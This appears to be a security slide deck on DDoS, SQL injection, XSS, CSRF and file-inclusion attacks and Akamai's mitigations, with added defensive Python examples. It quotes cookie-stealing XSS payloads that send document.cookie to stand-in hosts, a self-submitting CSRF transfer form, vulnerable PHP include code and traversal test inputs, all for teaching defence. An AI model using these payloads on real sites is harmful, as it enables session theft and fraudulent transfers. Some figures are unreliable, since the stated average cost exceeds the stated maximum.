Internet Security and Akamai's Solutions
Preview of internet security today and how Akamai, as a cloud service provider, mitigates attacks.

Agenda: How much is the cost? The most costly causes. Denial of Services. Web Attacks. Akamai's solutions.
How much is the cost?
2013 Cost of Cyber Crime Study: United States (Benchmark Study of U.S. Companies, Ponemon Institute, October 2013)
Annualized cost of cyber crime:
    Minimum: $1.3 million
    Maximum: $5.8 million
    Average: $8.9 million
    Increase of 26% from 2012
Source: http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf

The most costly causes
2013 Cost of Cyber Crime Study: United States (Benchmark Study of U.S. Companies, Ponemon Institute, October 2013)
Denial of services, web-based attacks and malicious code account for more than 55 percent of all cyber crime costs per organization on an annual basis.
Source: http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf
Denial of Services: What is it? DDoS. Akamai's solutions.

Denial of Services: What is it?
    Intention: intended users are not able to access the service(s).
    Mode: exploit infrastructure limitations such as network bandwidth, maximum connections, memory and CPU resources; exploit protocol limitations.
    Characteristics: bursts of packet data.
Denial of Services : Real-life Case
Denial of Services : DDoS attack
Denial of Services : Amplification
Denial of Services: DNS attack
DNS server attacks build on two characteristics of DNS: it relies on the User Datagram Protocol (UDP), a connectionless protocol that doesn't validate source IP addresses, which makes these addresses easy to forge; and a small DNS request can solicit a large amount of data in the response.
Akamai's Solutions for DoS

Akamai's Solutions for DoS
    Distributed perimeters: harder to overwhelm with a burst.
    Filtering packet data and forwarding only legitimate packets to the server.
    Network-layer control: drop network-layer DDoS attacks; define and enforce IP whitelists/blacklists.
    Adaptive rate control: application-layer DoS.
Web Attacks: SQL Injection
SQL injection, where bogus database queries are used to overwhelm or infiltrate critical applications and databases.

Web Attacks: SQL Injection
Exploits unsanitized input in an application to execute a malicious SQL query.
Web Attacks: Cross-Site Scripting
Allows attackers to enter a script that is then executed in the user's browser, for example to steal cookies.

Web Attacks: Cross-Site Scripting
Sample input into a guestbook, forum or private message:
    <SCRIPT type="text/javascript">
    var adr = '../evil.php?cakemonster=' + escape(document.cookie);
    </SCRIPT>

XSS
    "><a href="#" onclick="document.location='http://yoursite.com/whateveryouwant.php?cookie=' +escape(document.cookie);"><click Me></a></script>
Source: http://www.go4expert.com/articles/stealing-cookie-xss-t17066/
Web Attacks: CSRF
Combined with social engineering, tricks legitimate users into executing certain actions on the target host.

Web Attacks: CSRF Scheme

Web Attacks: CSRF
Combined with social engineering, tricks legitimate users into executing certain actions on the target host.
    POST http://bank.com/transfer.do HTTP/1.1
    acct=bob&amount=100

Web Attacks: CSRF
Combined with social engineering, tricks legitimate users into executing certain actions on the target host.
    <form action="http://bank.com/transfer.do" method="post">
    <input type="hidden" name="acct" value="maria"/>
    <input type="hidden" name="amount" value="100000"/>
    <input type="submit" value="view my pictures"/>
    </form>
    <body onload="document.forms[0].submit()">
    <form...
Akamai's Solutions for Web Attacks
Kona Site Defender with Web Application Firewall performs a 'deep inspection' of every request and response in every common form of Web traffic.
Kona Rules: Akamai's Threat Intelligence Team develops and updates WAF rules continually to address new and emerging web application attacks, such as SQL injections, cross-site scripting, remote file inclusion and more.

Akamai's Solutions for Web Attacks
Application-Layer Controls: a collection of predefined, configurable application-layer firewall rules addresses categories such as Protocol Violations, Request Limit Violations and HTTP Policy Violations.
Biggest saving from security technologies
2013 Cost of Cyber Crime Study: United States (Benchmark Study of U.S. Companies, Ponemon Institute, October 2013)
Source: http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf

Average days to resolve attack
2013 Cost of Cyber Crime Study: United States (Benchmark Study of U.S. Companies, Ponemon Institute, October 2013)
Source: http://media.scmagazine.com/documents/54/2013_us_ccc_report_final_6-1_13455.pdf
Remote File Injection
    <?php
    // define $authorized = true only if user is authenticated
    if (authenticated_user()) {
        $authorized = true;
    }
    // Because we didn't first initialize $authorized as false, this might be
    // defined through register_globals, like from GET auth.php?authorized=1
    // So, anyone can be seen as authenticated!
    if ($authorized) {
        include "/highly/sensitive/data.php";
    }
    ?>

Remote File Injection
    <?php
    $color = 'blue';
    if (isset($_GET['COLOR'])) {
        $color = $_GET['COLOR'];
    }
    require($color . '.php');
    ?>
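As an added example (not from the slides, and written in Python rather than the slides' PHP), this is the shape the `require($color . '.php')` lookup above should take: the user-supplied value is matched against an allowlist of known page names, and the resulting path is then checked to stay inside the template directory. `TEMPLATE_DIR` and `ALLOWED_COLORS` are constructed for the demonstration.

```python
import posixpath

# Constructed directory layout: the only pages the application may include.
TEMPLATE_DIR = "/var/www/app/themes"
ALLOWED_COLORS = {"blue", "red", "green"}


class IncludeRejected(ValueError):
    """Raised when a requested include does not resolve to an allowed page."""


def is_allowed(color):
    # Exact allowlist match: no traversal, no URL, no null byte can match.
    return color in ALLOWED_COLORS


def resolve_color_page(color):
    """Map a user-supplied COLOR value to the file that may be included.

    Two independent checks: the allowlist, then a path check that the
    normalized result still lies under TEMPLATE_DIR. The second check is
    redundant with a correct allowlist, which is the point: if the allowlist
    is later loosened, traversal is still caught.
    """
    if not is_allowed(color):
        raise IncludeRejected("unknown theme: %r" % color)
    path = posixpath.normpath(posixpath.join(TEMPLATE_DIR, color + ".php"))
    if posixpath.commonpath([TEMPLATE_DIR, path]) != TEMPLATE_DIR:
        raise IncludeRejected("path escapes template dir: %r" % path)
    return path


def resolve_or_default(color):
    # Fall back to the slide's default of 'blue' instead of echoing the
    # rejected value anywhere; the rejection is what should be logged.
    try:
        return resolve_color_page(color)
    except IncludeRejected:
        return resolve_color_page("blue")


if __name__ == "__main__":
    for value in ["red", "../../etc/passwd", "http://evil.example/shell.txt"]:
        print("%-35s -> %s" % (value, resolve_or_default(value)))
```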
CSRF prevention with Synchronizer Token
    <form action="/transfer.do" method="post">
    <input type="hidden" name="csrftoken" value="owy4nmqwode4odrjn2q2ntlhmmzlywe... wyzu1ywqwmtvhm2jmngyxyjjimgi4mjjjzde1zdz... MGYwMGEwOA==">
    </form>

How WAF prevents CSRF
A random token is added to every form as it streams through the firewall and is validated on the requests. This builds on the unique strengths of the Application Firewall to do in-line parsing of HTML to store all the links and forms sent to the client in that session. The firewall can thus validate all form fields against a stored signature to ensure no fields are added or tampered with.
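The synchronizer-token check from the two slides above, as an added example that is not code from the slides or from Akamai's WAF: the server issues a random token per session, embeds it in the form as a hidden `csrftoken` field, and refuses the transfer unless the submitted field matches. The attacker's auto-submitting form from the earlier CSRF slide carries the victim's session cookie but cannot read the token, so it fails the check. The session store, `/transfer.do` handler and field names are constructed for the demonstration.

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> session data.
SESSIONS = {}


def new_session():
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"csrftoken": secrets.token_urlsafe(32)}
    return sid


def render_transfer_form(sid):
    # The token is embedded as a hidden field, as on the slide's form.
    token = SESSIONS[sid]["csrftoken"]
    return (
        '<form action="/transfer.do" method="post">'
        '<input type="hidden" name="csrftoken" value="%s">'
        '<input name="acct"><input name="amount">'
        '<input type="submit"></form>' % token
    )


def handle_transfer(sid, form):
    """Server side of POST /transfer.do; form is a dict of POST fields.

    Returns (status, message). Rejects unless the submitted token equals
    the one stored for this session; compare_digest avoids leaking how many
    leading characters matched through timing.
    """
    session = SESSIONS.get(sid)
    if session is None:
        return 403, "no session"
    submitted = form.get("csrftoken", "")
    if not hmac.compare_digest(submitted, session["csrftoken"]):
        return 403, "csrf token missing or invalid"
    return 200, "transferred %s to %s" % (form["amount"], form["acct"])


def extract_token(form_html):
    # What a legitimate browser does implicitly: it submits the hidden field
    # that the server itself rendered into the page.
    marker = 'name="csrftoken" value="'
    start = form_html.index(marker) + len(marker)
    return form_html[start:form_html.index('"', start)]


if __name__ == "__main__":
    sid = new_session()
    token = extract_token(render_transfer_form(sid))
    # Legitimate submission from the rendered form.
    print(handle_transfer(sid, {"csrftoken": token, "acct": "bob", "amount": "100"}))
    # Cross-site form: the session cookie rides along, the token does not.
    print(handle_transfer(sid, {"acct": "maria", "amount": "100000"}))
```

Tokens must be bound to the session, not global: the last assertion in the test submits a valid token issued to a different session and is still rejected.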
How to prevent XSS
First of all, encode all <, >, and &. This should be the first step of your XSS filter. See the encoding below:
    &  →  &amp;
    <  →  &lt;
    >  →  &gt;
    "  →  &quot;
    '  →  &#x27;
    /  →  &#x2F;
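An added example, not code from the slides: the six-character encoding table above implemented as an output encoder, applied to the guestbook payload from the earlier XSS slide so the script text is rendered as visible characters rather than executed. The guestbook rendering function and its markup are constructed for the demonstration.

```python
import html

# The mapping from the slide: the HTML body-context encoding rules.
HTML_ENCODE = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "/": "&#x2F;",
}


def encode_for_html(text):
    # Single pass over the characters: '&' is replaced once and its
    # replacement is never re-scanned, so input is not double-encoded.
    return "".join(HTML_ENCODE.get(ch, ch) for ch in text)


def render_guestbook_entry(author, message):
    # Encode every untrusted value at output time, in the context where it
    # is inserted; the markup itself is written by the application.
    return "<p><b>%s</b>: %s</p>" % (encode_for_html(author), encode_for_html(message))


def round_trips(text):
    # Encoding is lossless: a browser decoding the entities displays the
    # original characters, it just never parses them as markup.
    return html.unescape(encode_for_html(text)) == text


# The sample guestbook input from the XSS slide, used here as test input.
SAMPLE_PAYLOAD = (
    "<SCRIPT type=\"text/javascript\"> var adr = '../evil.php?cakemonster=' "
    "+ escape(document.cookie); </SCRIPT>"
)

if __name__ == "__main__":
    print(render_guestbook_entry("visitor", SAMPLE_PAYLOAD))
```

Note that this table is the rule for text placed in the HTML body; a value inserted into a JavaScript string or a URL parameter needs the encoding for that context instead.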
Amplification Attacks
DNS server attacks build on two characteristics of DNS: it relies on the User Datagram Protocol (UDP), a connectionless protocol that doesn't validate source IP addresses, which makes these addresses easy to forge; and a small DNS request can solicit a large amount of data in the response.
NTP attacks use a UDP-based protocol that is prone to amplification attacks. With the monlist command, a 234-byte request could yield a response of 100 packets totalling more than 48K, an amplification factor of 206x.
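An added example, not from the slides: the amplification factor computed from the request and response sizes the slide quotes, and a detection heuristic over flow records that flags a host receiving far more bytes from DNS/NTP service ports than it ever sent to them, which is what a spoofed-source victim looks like from the network. The flow records are constructed; the NTP response sizes are modelled on the slide's figures and are not measurements.

```python
from collections import defaultdict

# Constructed flow records: (src, sport, dst, dport, bytes). Not real traffic.
FLOWS = [
    # Ordinary DNS: small query, modest answer.
    ("10.0.0.5", 51000, "192.0.2.53", 53, 60),
    ("192.0.2.53", 53, "10.0.0.5", 51000, 180),
    # Spoofed-source NTP monlist: 203.0.113.9 sent one small request (or none)
    # yet receives large responses from several servers.
    ("203.0.113.9", 33000, "198.51.100.1", 123, 234),
    ("198.51.100.1", 123, "203.0.113.9", 33000, 48204),
    ("198.51.100.2", 123, "203.0.113.9", 33000, 48204),
    ("198.51.100.3", 123, "203.0.113.9", 33000, 48204),
]

# Service ports of the two amplifier protocols discussed on the slide.
AMPLIFIER_PORTS = {53, 123}


def amplification_factor(request_bytes, response_bytes):
    # Bytes received per byte sent; the slide's 234 B -> 48 KB is ~206x.
    return response_bytes / request_bytes


def suspected_amplification_victims(flows, threshold=20.0):
    """Return {host: ratio} for hosts whose inbound bytes from amplifier
    service ports exceed their outbound bytes to those ports by `threshold`.

    A host that never sent a request but receives responses gets an infinite
    ratio, the clearest sign that its address was forged by someone else.
    """
    received = defaultdict(int)
    sent = defaultdict(int)
    for src, sport, dst, dport, nbytes in flows:
        if sport in AMPLIFIER_PORTS:
            received[dst] += nbytes
        if dport in AMPLIFIER_PORTS:
            sent[src] += nbytes
    victims = {}
    for host, rx in received.items():
        tx = sent.get(host, 0)
        ratio = rx / tx if tx else float("inf")
        if ratio >= threshold:
            victims[host] = ratio
    return victims


if __name__ == "__main__":
    print("monlist factor: %.0fx" % amplification_factor(234, 48204))
    for host, ratio in suspected_amplification_victims(FLOWS).items():
        print("suspected victim %s: %.0fx more received than sent" % (host, ratio))
```

The threshold is deliberately loose: legitimate DNS answers are a few times larger than their queries, so anything above an order of magnitude on aggregate is worth an alert, and the mitigation on the amplifier side is the same either way (disable monlist, rate-limit responses, and stop forwarding packets with forged source addresses at the network edge).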
SYN flood
Source: https://www.usenix.org/legacy/events/bsdcon02/full_papers/lemon/lemon_html/node2.html